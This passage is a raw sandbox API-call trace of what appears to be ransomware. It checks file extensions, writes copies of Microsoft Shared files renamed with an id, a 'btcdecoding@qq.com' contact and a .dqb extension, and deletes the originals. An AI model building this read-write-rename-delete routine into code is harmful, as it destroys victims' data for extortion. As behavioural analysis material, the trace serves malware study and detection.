[0051.486] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0051.486] lstrlenW (lpString=".docx") returned 5 [0051.486] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0051.486] lstrlenW (lpString=".pdf") returned 4 [0051.486] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0051.486] lstrlenW (lpString=".xls") returned 4 [0051.486] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0051.486] lstrlenW (lpString=".xlsx") returned 5 [0051.486] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0051.486] lstrlenW (lpString=".ppt") returned 4 [0051.486] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0051.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.486] lstrlenW (lpString=".zip") returned 4 [0051.486] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0051.486] lstrlenW (lpString=".rar") returned 4 [0051.486] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0051.486] lstrlenW (lpString=".bz2") returned 4 [0051.486] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0051.486] lstrlenW (lpString=".7z") returned 3 [0051.486] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0051.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.487] lstrlenW (lpString=".dbf") returned 4 [0051.487] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0051.487] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.487] lstrlenW (lpString=".1cd") returned 4 [0051.487] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0051.487] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.487] lstrlenW (lpString=".jpg") returned 4 [0051.487] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0051.487] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.487] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.487] lstrlenW (lpString=".doc") returned 4 [0051.487] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0051.487] lstrlenW (lpString=".docx") returned 5 [0051.487] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0051.487] lstrlenW (lpString=".pdf") returned 4 [0051.487] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0051.487] lstrlenW (lpString=".xls") returned 4 [0051.487] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0051.487] lstrlenW (lpString=".xlsx") returned 5 [0051.487] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0051.487] lstrlenW (lpString=".ppt") returned 4 [0051.487] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0051.487] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.487] lstrlenW (lpString=".zip") returned 4 [0051.487] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0051.487] lstrlenW (lpString=".rar") returned 4 [0051.487] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0051.487] lstrlenW (lpString=".bz2") returned 4 [0051.487] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0051.487] lstrlenW (lpString=".7z") returned 3 [0051.487] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0051.487] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.487] lstrlenW (lpString=".dbf") returned 4 [0051.487] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0051.487] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.488] lstrlenW (lpString=".1cd") returned 4 [0051.488] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0051.488] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0051.488] lstrlenW (lpString=".jpg") returned 4 [0051.488] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0051.488] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0051.488] lstrlenW (lpString="MSOEURO.DLL") returned 11 [0051.488] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0051.488] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=31104) returned 1 [0051.488] CloseHandle (hObject=0x1dc) returned 1 [0051.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll")) returned 0x20 [0051.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0051.489] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0051.489] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.489] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.489] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.489] GetLastError () returned 0x0 [0051.489] ReadFile (in: hFile=0x1dc, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x7980, lpOverlapped=0x0) returned 1 [0051.499] WriteFile (in: hFile=0x228, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x7990, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x7990, lpOverlapped=0x0) returned 1 [0051.501] ReadFile (in: hFile=0x1dc, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.501] WriteFile (in: hFile=0x228, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xea, lpOverlapped=0x0) returned 1 [0051.501] SetEndOfFile (hFile=0x228) returned 1 [0051.501] CloseHandle (hObject=0x228) returned 1 [0051.501] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.501] SetEndOfFile (hFile=0x1dc) returned 1 [0051.502] CloseHandle (hObject=0x1dc) returned 1 [0051.502] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.502] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll")) returned 1 [0051.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.503] lstrlenW (lpString=".doc") returned 4 [0051.503] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.503] lstrlenW (lpString=".docx") returned 5 [0051.503] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0051.503] lstrlenW (lpString=".pdf") returned 4 [0051.503] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.503] lstrlenW (lpString=".xls") returned 4 [0051.503] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.503] lstrlenW (lpString=".xlsx") returned 5 [0051.503] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0051.503] lstrlenW (lpString=".ppt") returned 4 [0051.503] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.503] lstrlenW (lpString=".zip") returned 4 [0051.503] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.503] lstrlenW (lpString=".rar") returned 4 [0051.503] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.503] lstrlenW (lpString=".bz2") returned 4 [0051.503] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.503] lstrlenW (lpString=".7z") returned 3 [0051.503] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.503] lstrlenW (lpString=".dbf") returned 4 [0051.503] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.503] lstrlenW (lpString=".1cd") returned 4 [0051.503] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.503] lstrlenW (lpString=".jpg") returned 4 [0051.504] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.504] lstrlenW (lpString=".doc") returned 4 [0051.504] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.504] lstrlenW (lpString=".docx") returned 5 [0051.504] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0051.504] lstrlenW (lpString=".pdf") returned 4 [0051.504] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.504] lstrlenW (lpString=".xls") returned 4 [0051.504] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.504] lstrlenW (lpString=".xlsx") returned 5 [0051.504] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0051.504] lstrlenW (lpString=".ppt") returned 4 [0051.504] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.504] lstrlenW (lpString=".zip") returned 4 [0051.504] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.504] lstrlenW (lpString=".rar") returned 4 [0051.504] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.504] lstrlenW (lpString=".bz2") returned 4 [0051.504] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.504] lstrlenW (lpString=".7z") returned 3 [0051.504] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.504] lstrlenW (lpString=".dbf") returned 4 [0051.504] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.504] lstrlenW (lpString=".1cd") returned 4 [0051.504] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.504] lstrlenW (lpString=".jpg") returned 4 [0051.504] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.505] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0051.505] lstrlenW (lpString="odffilt.dll") returned 11 [0051.505] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0052.446] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=1312656) returned 1 [0052.446] CloseHandle (hObject=0x17c) returned 1 [0052.446] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll")) returned 0x20 [0052.446] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0052.446] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0052.447] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.447] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.447] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0052.447] GetLastError () returned 0x0 [0052.447] ReadFile (in: hFile=0x17c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0052.467] WriteFile (in: hFile=0x230, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0052.485] ReadFile (in: hFile=0x17c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x407a0, lpOverlapped=0x0) returned 1 [0052.556] WriteFile (in: hFile=0x230, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x407b0, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x407b0, lpOverlapped=0x0) returned 1 [0052.564] ReadFile (in: hFile=0x17c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.564] WriteFile (in: hFile=0x230, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xea, lpOverlapped=0x0) returned 1 [0052.564] SetEndOfFile (hFile=0x230) returned 1 [0052.571] CloseHandle (hObject=0x230) returned 1 [0052.611] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.611] SetEndOfFile (hFile=0x17c) returned 1 [0052.614] CloseHandle (hObject=0x17c) returned 1 [0052.614] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.614] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll")) returned 1 [0052.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.614] lstrlenW (lpString=".doc") returned 4 [0052.614] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.614] lstrlenW (lpString=".docx") returned 5 [0052.614] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0052.614] lstrlenW (lpString=".pdf") returned 4 [0052.614] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.614] lstrlenW (lpString=".xls") returned 4 [0052.614] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.614] lstrlenW (lpString=".xlsx") returned 5 [0052.615] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0052.615] lstrlenW (lpString=".ppt") returned 4 [0052.615] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.615] lstrlenW (lpString=".zip") returned 4 [0052.615] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.615] lstrlenW (lpString=".rar") returned 4 [0052.615] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.615] lstrlenW (lpString=".bz2") returned 4 [0052.615] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.615] lstrlenW (lpString=".7z") returned 3 [0052.615] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.615] lstrlenW (lpString=".dbf") returned 4 [0052.615] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.615] lstrlenW (lpString=".1cd") returned 4 [0052.615] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.615] lstrlenW (lpString=".jpg") returned 4 [0052.615] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.615] lstrlenW (lpString=".doc") returned 4 [0052.615] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.615] lstrlenW (lpString=".docx") returned 5 [0052.615] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0052.615] lstrlenW (lpString=".pdf") returned 4 [0052.615] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.615] lstrlenW (lpString=".xls") returned 4 [0052.615] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.615] lstrlenW (lpString=".xlsx") returned 5 [0052.615] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0052.615] lstrlenW (lpString=".ppt") returned 4 [0052.616] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.616] lstrlenW (lpString=".zip") returned 4 [0052.616] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.616] lstrlenW (lpString=".rar") returned 4 [0052.616] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.616] lstrlenW (lpString=".bz2") returned 4 [0052.616] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.616] lstrlenW (lpString=".7z") returned 3 [0052.616] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.616] lstrlenW (lpString=".dbf") returned 4 [0052.616] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.616] lstrlenW (lpString=".1cd") returned 4 [0052.616] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0052.616] lstrlenW (lpString=".jpg") returned 4 [0052.616] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.616] lstrcmpiW (lpString1=".CFG", lpString2=".dqb") returned -1 [0052.616] lstrlenW (lpString="CGMIMP32.CFG") returned 12 [0052.616] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0052.617] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=6811) returned 1 [0052.617] CloseHandle (hObject=0x17c) returned 1 [0052.617] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg")) returned 0x20 [0052.617] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0052.617] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0052.617] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.617] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.617] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0052.617] GetLastError () returned 0x0 [0052.617] ReadFile (in: hFile=0x17c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x1a9b, lpOverlapped=0x0) returned 1 [0052.619] WriteFile (in: hFile=0x230, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x1aa0, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x1aa0, lpOverlapped=0x0) returned 1 [0052.620] ReadFile (in: hFile=0x17c, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.620] WriteFile (in: hFile=0x230, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.620] SetEndOfFile (hFile=0x230) returned 1 [0052.620] CloseHandle (hObject=0x230) returned 1 [0052.620] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.620] SetEndOfFile (hFile=0x17c) returned 1 [0052.621] CloseHandle (hObject=0x17c) returned 1 [0052.621] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.621] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg")) returned 1 [0052.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0052.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0052.621] lstrlenW (lpString=".doc") returned 4 [0052.621] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1 [0052.621] lstrlenW (lpString=".docx") returned 5 [0052.621] lstrcmpiW (lpString1=".docx", lpString2="2.CFG") returned -1 [0052.622] lstrlenW (lpString=".pdf") returned 4 [0052.622] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1 [0052.622] lstrlenW (lpString=".xls") returned 4 [0052.622] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1 [0052.622] lstrlenW (lpString=".xlsx") returned 5 [0052.622] lstrcmpiW (lpString1=".xlsx", lpString2="2.CFG") returned -1 [0052.622] lstrlenW (lpString=".ppt") returned 4 [0052.622] 